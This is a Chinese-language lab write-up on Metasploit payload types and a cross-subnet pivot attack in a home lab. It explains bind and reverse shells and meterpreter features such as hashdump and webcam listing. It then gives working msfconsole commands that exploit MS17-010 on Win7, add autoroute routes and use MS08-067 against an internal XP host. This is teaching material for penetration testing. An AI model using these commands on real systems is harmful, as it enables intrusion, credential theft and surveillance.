接着上回的配置环境继续探索神奇事件
漏洞配置环境
-
攻击机:kali(net): 192.168.28.129
-
靶机:
- win7(net、主机;双网卡): 192.168.28.128 ; 192.168.116.131
- Winxp(主机): 192.168.116.129
知识点
-
攻击载荷模块(payload): 攻击载荷是在渗透攻击成功后促使目标系统运行的一段植入代码。
-
Single 是一种完全独立的Payload,而且使用起来就像运行 calc.exe 一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似 netcat 这样的非metasploit处理工具所捕捉到。
-
Stager 这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。
- 一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口(反向连接)。
- 另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。
正向连接bind_tcp
- kali连接主机bind_tcp
- 受害主机具有公网IP,与kali处于同一个网段
- 被控主机有公网IP又不出网,考虑正向链接
反向连接reverse_tcp
- 主动连接时有防火墙,访问不了,通过发送一段代码,让主机自动连接kali
- 被控主机出网,优先考虑反向连接
-
出网,不出网 内网渗透具体
-
Stage 是Stager Payload下的一种Payload组件,这种Payload可以提供更加高级的功能,而且没有大小限制
-
Single Payload的格式为:/ 如:windows/powershell_bind_tcp
-
Stager/Stage Payload的格式为:/ / 如:windows/meterpreter/bind_tcp
-
-
hashdump查看目标系统用户名、密码的哈希值,通过解密可得。 -
screenshot截图 -
webcam_list摄像头
跨网段攻击(ms08-067漏洞复现)
-
kali-通过->win7-攻击->XP
-
通过ms17-010漏洞拿到win7主机权限
-
查看arp缓存,执行
arp -a命令
发现内网存在192.168.116.129的主机
- ^z返回meterpreter终端
将内网网段192.168.116.0/24添加至路由表,使用 autoroute 脚本;
run autoroute -s 192.168.116.0/24
run autoroute -p //查看路由表映射情况
- 将会话退出到后台
background
- 由于内网主机是winXP 直接使用ms08-067进行攻击
search ms08-067
注意:这里payload只能使用正向连接
use 0 //攻击模块
set payload windows/meterpreter/bind_tcp //设置payload
set rhost 192.168.116.129 //设置攻击目标
set lhost 192.168.28.129 //设置攻击者
show options //查看配置
run //攻击
- 攻击不成功
查找问题:
1.xp防火墙是否关闭;
2.xp端口是否开放;
3.xp不稳定,更换思路,用xp攻击win7,将xp设置成双网卡,重新上面步骤。
- 我还有点不死心,让我再试一试
show targets //查看可攻击系统
set target 7 //设置攻击系统为7
- 成功!
- 截个图
参考文档: